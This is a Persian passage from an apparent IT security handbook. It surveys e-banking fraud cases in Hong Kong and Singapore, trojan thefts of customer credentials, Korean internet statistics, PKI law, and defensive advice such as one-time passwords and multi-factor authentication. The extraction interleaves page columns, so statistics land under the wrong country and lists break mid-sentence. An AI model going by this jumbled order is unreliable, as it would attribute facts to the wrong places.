ﻧﻴـﺰ ﻳﺎ ﻧﺎﺗﻮﺍﻧﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘ ﹺ ﺑﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻴﺎﻓﺰﺍﻳﻴﻢ ،ﺍﻳﻦ ﺩﺭﺻﺪ ﺑﺎﺯ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ ﻳﺎﻓﺖ. 228 Forum of Incident Response and Security Teams )229 Internet Security Alliance (www.isalliance.org ٢١٧ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻤﻜـﻦ ﺣﻔﺎﻇـﺖ ﻧﻤـﻲﻛﻨـﺪ. ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ ﻭ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺑـﺎ ﻣﻌﻤـﺎﺭﻱ ﺑـﺎﺯ ﺗﻌﺮﻳـﻒ ﺷﺪﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭﺍﻗﻌﻲ ﻫﺮ ﻻﻳﻪ، ﻧﻴﺎﺯ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﺪﺍﺭﺩ .ﺍﻳـﻦ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪ ﺩﺭ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨـﺶ ﻛﺘـﺎﺏ ﺗﻮﺿـﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ. 
ﻫﻮﺷﻤﻨﺪ( .ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺍﺯ ﻫـﺮ ﺭﻣـﺰ ﻋﺒﻮﺭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻜﺒﺎﺭ ﻣﻲﺗﻮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ. .۴ ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ )ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺯﻧﺠﻴﺮ ﺍﻣﻨﻴﺘـﻲ( ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ ﺭﻭﺷـﻬﺎ ﻭ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻦ ﺑﺎﺷﻨﺪ ،ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺷﺎﻣﻞ ﻧﺼﺐ ﺩﻳﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗﺶ ﺷﺨﺼﻲ ٢٣٠ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻧﻴﺰ ﻣﻲﺷﻮﺩ. .۵ ﺭﻭﻳﺪﺍﺩﻫﺎ ﺑﺎﻳﺪ ﻣﺪﻳﺮﻳﺖ ﺷﺪﻩ ﻭ ﺑﺴﺮﻋﺖ ﮔﺰﺍﺭﺵ ﺷﻮﻧﺪ ﺗـﺎ ﻧﺴﺒﺖ ﺑﻪ ﻭﺍﻛﻨﺶ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﺗـﻴﻢ ﺍﻣﻨﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ. ﻧﻘﺶ ﻛﺸﻮﺭﻫﺎ ﻫﻨﮓﻛﻨﮓ ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺍﺩﺍﺭﺓ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ ﻫﻨﮓﻛﻨﮓ ﺑـﺎ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﺳـﻪ ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ: .۱ ﻧﻔﻮﺫﮔﺮﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺮﺍﻭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺗﻌﺪﺍﺩﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭ ﺷﻨﺎﺳﻪ ﺍﻗﺪﺍﻡ ﻛـﺮﺩ ﻭ ﺗﻮﺍﻧـﺴﺖ ﺑـﻴﺶ ﺍﺯ ۳۵,۰۰۰ ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺟﺎﺑﺠﺎ ﻛﻨﺪ. .۲ ﻳﻚ ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺪﻟﻴﻞ ﺿﻌﻒ ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴﺴﺘﻢ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺭﻭﻱ ﺩﺍﺩ .ﺑﺪﻟﻴﻞ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻥ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻻﺯﻡ ،ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻮﺍﻧﺴﺘﻨﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺣﺪﻭﺩ ﺳﻪ ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺳﺮﻗﺖ ﻛﻨﻨﺪ. .۳ ﺩﺭ ﻳﻚ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻮﺍﻧﺴﺘﻨﺪ ﺣﺪﻭﺩ ۵ﻣﻴﻠﻴﻮﻥ ﺳﻬﻢ )ﺑﺎ ﺍﺭﺯﺷﻲ ﺑﺮﺍﺑﺮ ۲۱،۷ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜـﺎ( ﺭﺍ ﻓﺮﻭﺧﺘﻪ ﻭ ﺩﺭ ﻗﻴﻤﺖ ﺳﻬﺎﻡ ﻧﻮﺳﺎﻥ ﺷﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ. ﺑﺤﺚ ﻛﺸﻮﺭ ﺳﻨﮕﺎﭘﻮﺭ ﺣﻮﻝ ﭼﻬﺎﺭ ﻣﺤﻮﺭ ﺍﺻـﻠﻲ ﺑـﻮﺩ :ﺁﻣﺎﺭﻫـﺎ ﻭ ﻧﻜﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺸﻮﺭ ﻛـﺮﻩ ،ﻭﺿـﻌﻴﺖ ﺍﻗﺘـﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ، ﺯﻳﺮﺳﺎﺧﺖ ﻣﻠﻲ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ،ﻭ ﻭﺍﻛﻨﺸﻬﺎﻱ ﺩﻭﻟـﺖ ﺩﺭ ﺣـﻮﺍﺩﺙ ﺍﺧﻴﺮ .ﺑﺤﺚ ﺑﺎ ﺍﺭﺍﺋﻪ ﺷﻮﺍﻫﺪﻱ ﺍﺯ ﺭﺷﺪ ﺳﺮﻳﻊ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺧـﻼﻝ ﺳﺎﻟﻬﺎﻱ ۱۹۹۸ﺗﺎ ،۲۰۰۱ﺍﺯ ﻣﻮﺭﺩ ﺍﻭﻝ ﺷﺮﻭﻉ ﺷﺪ: .۱ ﺗﻐﻴﻴﺮﺍﺕ ﺣﺴﺎﺑﻬﺎﻱ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺍﻣﺮ ﺑﻪ ﻣﻌﻨﻲ ﻛﻨﺘﺮﻝ ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺍﻧﺘﻘﺎﻟﻬـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ. • ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺩﺭﺁﻣﺪﻫﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺣـﺪﻭﺩ ۴۰ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺑﻮﺩ ﻭ ﺩﺭ ﺳـﺎﻝ ۲۰۰۱ﺑـﻪ ۹۱ﻣﻴﻠﻴـﻮﻥ ﺩﻻﺭ ﺭﺳﻴﺪ. .۲ ﻣﻌﺎﻣﻼﺕ ﺑﺎﻧﻜﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ،ﻭ ﺩﺭ ﻣـﻮﺭﺩ ﻣﻌﺎﻣﻼﺕ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻣـﺸﻜﻮﻙ ﺑـﺎ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎ ﻫﻤﺎﻫﻨﮕﻲ ﻣﺠﺪﺩ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ )ﺍﺯ ﻃﺮﻳﻖ ،SMSﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(. • ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺗﻌﺪﺍﺩ ۱۴,۰۰۰ﺧﺎﻧﻮﺍﺭ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﺑﻮﺩﻧﺪ ﻭ ﺍﻳﻦ ﺗﻌﺪﺍﺩ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﻪ ۷،۸ﻣﻴﻠﻴﻮﻥ ﻣﻌﺎﺩﻝ %۶۴ﺟﻤﻌﻴﺖ ﺭﺳﻴﺪ. 
.۳ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﺸﺘﺮﻱ ﺍﺯ ﻋﻮﺍﻣﻞ ﭼﻨﺪﮔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ )ﺑﺮ ﺍﺳﺎﺱ ﺍﺑﺰﺍﺭﻱ ﻛﻪ ﺗﻨﻬﺎ ﻣـﺸﺘﺮﻱ ﺁﻧـﺮﺍ ﺩﺍﺭﺩ؛ ﻣﺜـﻞ ﻛـﺎﺭﺕ ﺩﺭﺳﻬﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳﻦ ﺭﻭﻳﺪﺍﺩﻫﺎ ﮔﺮﻓﺖ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ: ﺳﻨﮕﺎﭘﻮﺭ 230 Personal Firewalls ﺑﺨﺶ ﺳﻮﻡ ﺩﺭ ﻫﻨﮓﻛﻨﮓ ،ﺩﻭﻟﺖ ﺑﺎ ﺑﺎﻧﻜﻬﺎ ﻭ ﭘﻠﻴﺲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺭﻭﻳـﺪﺍﺩﻫﺎ ﻭ ﺧﻄﺮﺍﺕ ﻫﻤﻜﺎﺭﻱ ﻣﻲ ﻛﻨﺪ ﻭ ﺑـﺎ ﺍﻋﻤـﺎﻝ ﻣـﺪﻳﺮﻳﺖ ﺍﺛـﺮﺑﺨﺶ، ﭘﺎﺳــﺨﮕﻮﻳﻲ ﺭﺍ ﺗــﻀﻤﻴﻦ ،ﺭﻭﻳــﺪﺍﺩﻫﺎ ﺭﺍ ﮔــﺰﺍﺭﺵ ،ﺧــﺴﺎﺭﺗﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ،ﻭ ﺍﻋﺘﻤﺎﺩ ﻋﻤﻮﻣﻲ ﺭﺍ ﺟﻠﺐ ﻣﻲﻧﻤﺎﻳﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻃﻴـﻒ ﻭﺳـﻴﻊ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ISPﻫﺎ ،ﺗﻨﻮﻉ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﻧﺤــﻮﺓ ﻛﻨﺘــﺮﻝ ،ﺍﻳﻤــﻦﺳــﺎﺯﻱ ،ﻭ ﺁﮔــﺎﻩﻛــﺮﺩﻥ ﻋﻤــﻮﻡ ﺩﺭ ﻣــﻮﺭﺩ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺷﻮﺍﺭ ﮔﺮﺩﺩ. ٢١٨ ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ • ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺗﻨﻬـﺎ ۳ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺟـﻮﺩ ﺩﺍﺷﺖ ،ﻛﻪ ﺍﻳﻦ ﺭﻗﻢ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﻪ ۲۴ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ )ﻧﻴﻤﻲ ﺍﺯ ﺟﻤﻌﻴﺖ ﻛﺮﻩ( ﺭﺳﻴﺪ. • ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴﺎﺭ ﺗﻮﺳـﻂ ﺑـﻴﺶ ﺍﺯ %۵۰ ﺟﻤﻌﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ. ﻼ ﺍﺛﺒﺎﺕ ﺷـﺪﻩ ﻋﻤﻮﻣﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﻛﺎﻣ ﹰ ﺍﺳﺖ .ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺑـﺴﻴﺎﺭ ﻓﺮﺍﮔﻴـﺮ ﻭ ﻣﺤﺒﻮﺏ ﻫﺴﺘﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺟﻤﻌﻴﺖ ﺍﻧﺪﻙ ۴ﻣﻴﻠﻴﻮﻧﻲ ،ﺗﻘﺮﻳﺒﹰﺎ %۲۵ ﺟﻤﻌﻴﺖ ﺍﺯ ﺧـﺪﻣﺎﺕ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻬـﺮﻩ ﻣـﻲﮔﻴﺮﻧـﺪ. ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺻﻨﻌﺖ ﻧﻴـﺰ ﺑـﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﺍﺳـﺖ. ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳـﺎﻝ ۱۹۹۷ﺷـﺮﻭﻉ ﺷـﺪ ﻭ ﺍﻛﻨـﻮﻥ ﺣـﺪﻭﺩ %۵۰ﻛﻞ ﻣﻌﺎﻣﻼﺕ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳـﺖ .ﺍﻣـﺎ ﺩﺭ ﻧﻘﻄﺔ ﻣﻘﺎﺑﻞ ،ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑـﻪ ﺍﻳـﻦ ﺳـﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﺭﺷﺪ ﻧﻴﺴﺖ ،ﺍﮔﺮﭼﻪ ﻃﺒﻴﻌﺖ ﺁﻥ ﺍﻳﻨﻄﻮﺭ ﺍﻳﺠﺎﺏ ﻣﻲﻛﻨﺪ .ﺧـﺪﻣﺎﺕ ﻻ ﻧﻴﺎﺯ ﺑﻪ ﺑﻮﻣﻲﺳﺎﺯﻱ ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ ﺑﻴﻤﻪ ﻣﻌﻤﻮ ﹰ ﻫﻤﻪﺟﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﻭ ﻛﺎﺭﺁﻱ ﺑﻴﻤﻪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ. 
ﺑﺎ ﻧﮕﺎﻩ ﺑﻪ ﺟﻨﺒﺔ ﺟﻨﺎﻳﻲ ﺍﻳﻦ ﺗﺤﻮﻻﺕ ،ﺁﻣﺎﺭﻫﺎ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻭﻗـﻮﻉ ﺗﻘﺮﻳﺒﹰﺎ ۱۰۰ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ۱۹۹۶ﻭ ۱۹۹۷ ﻫﺴﺘﻨﺪ .ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻪ ﻋﺪﺩ ۵,۰۰۰ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﻋﺪﻱ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ .ﺍﮔﺮﭼـﻪ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﻴﺖ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﺩﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﺧﻴﺮ )ﻛﻪ ﺫﻳ ﹰﻼ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷـﺪﻩ( ﺑﺎﺭ ﺩﻳﮕﺮ ﺍﻫﻤﻴﺖ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺭﻭﺷـﻦ ﻣﻲﻛﻨﻨﺪ: .۱ ﺩﺭ ﻳﻚ ﺭﺧﺪﺍﺩ ،ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺰﺭﮔﺘـﺮﻳﻦ ﺑﺎﻧـﻚ ﺳﻨﮕﺎﭘﻮﺭﻱ ﺁﻟﻮﺩﻩ ﺑﻪ ﺍﻧﻮﺍﻋﻲ ﺍﺯ ﺗﺮﺍﻭﺍﻫﺎ ﺷﺪ .ﺍﻳـﻦ ﺗﺮﺍﻭﺍﻫـﺎ ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ ﺑﺮﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺭﺳﺎﻝ ﻣـﻲﻛﺮﺩﻧـﺪ ﻭ ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺳﺎﺭﻗﻴﻦ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﻣﻘﺎﺩﻳﺮ ﻋﻈﻴﻤﻲ ﭘﻮﻝ ﺑـﻪ ﺳﺮﻗﺖ ﺑﺒﺮﻧﺪ .ﺍﻳﻦ ﺗﺮﺍﻭﺍﻱ ﺧﺎﺹ ﺁﻧﻘﺪﺭ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩ ﻛـﻪ ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺑﻬﺎ ﺑﻪ ﺳﻼﻣﺖ ﻋﺒﻮﺭ ﻣﻲﻛـﺮﺩ. ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻣﻲﺗﻮﺍﻥ ﻧﺘﻴﺠﻪ ﮔﺮﻓﺖ ﻛـﻪ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ )ﺿﺪﻭﻳﺮﻭﺱ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ( ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺩﻓـﺎﻋﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺎﺷﻨﺪ. .۲ ﺣﺎﺩﺛﺔ ﺩﻳﮕﺮ ﺩﺭ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ ﺭﻭﻱ ﺩﺍﺩ، ﺍﻣﺎ ﺗﻮﺟﻪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ ﻧﻜﺮﺩ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﺁﺳﻴﺐ ﺩﻳﺪﻧﺪ ﻛﻪ ﻭﺻﻠﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﺍﻋﻤـﺎﻝ ﻧﺸﺪﻩ ﺑﻮﺩ .ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﺣﻤﻠﻪ ﺑﺪﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻓﺎﺵ ﻧﺸﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺣﺎﺩﺛﻪ ﻧﻴﺰ ﺑﺎﺭ ﺩﻳﮕﺮ ﻟـﺰﻭﻡ ﻫﻤﻜـﺎﺭﻱ ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﮔﺬﺍﺷﺖ. ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻄﻮﺭ ﻓﻌﺎﻝ ﺑﻪ ﻣﻮﺿﻮﻉ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ) (PKIﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ" .ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ" ﺳﻨﮕﺎﭘﻮﺭ )ﻣﺼﻮﺏ ﺳﺎﻝ (۱۹۹۹ﻣﺴﺌﻮﻟﻴﺖ PKIﺍﻳﻦ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺍﻃﻼﻋﺎﺕ ﺳﭙﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﺔ PKIﻣﻠﻲ ﺍﻳﻦ ﻛﺸﻮﺭ ،ﻣﺮﺍﻛـﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ٢٣١ﻣﻌﺘﺒﺮ ﺭﺍ ﻣﻌﻴﻦ ﻣﻲﻛﻨﺪ. 
ﺍﻣﺎ ﺍﺯ ﮔﻮﺍﻫﻲ ﻧـﻮﻋﻲ ﺷـﻨﺎﺧﺖ ﺩﻭﺟﺎﻧﺒـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺳـﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﺮﻩ ) ٢٣٢(KISAﺑﻴﺸﺘﺮ ﺑﺎ ﻣﻮﺿﻮﻋﺎﺕ ﺗﻜﻨﻴﻜـﻲ ﻣﺜﻞ ﻧﻈﺎﺭﺕ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ،ﺗـﺼﺪﻳﻖ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ ،ﻭ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪ ﺩﺭﺑﺎﺭﺓ PKIﺳﻴﻤﻲ ﻭ ﺑـﻲﺳـﻴﻢ ﺳـﺮ ﻭ ﻛـﺎﺭ ﺩﺍﺭﺩ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷـﺶ ﻣﺮﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ .ﭼﻮﻥ ﮔﻮﺍﻫﻲﻫـﺎ ﺗﻮﺳـﻂ ﺗﻤـﺎﻡ ﻣﺮﺍﻛـﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ،ﻣـﺸﺘﺮﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﻣﻌﺎﻣﻼﺕ ﻣﺨﺘﻠﻒ ﻳﻚ ﺍﻣﻀﺎﻱ ﻭﺍﺣﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤﺖ ﺣﻤﺎﻳﺖ 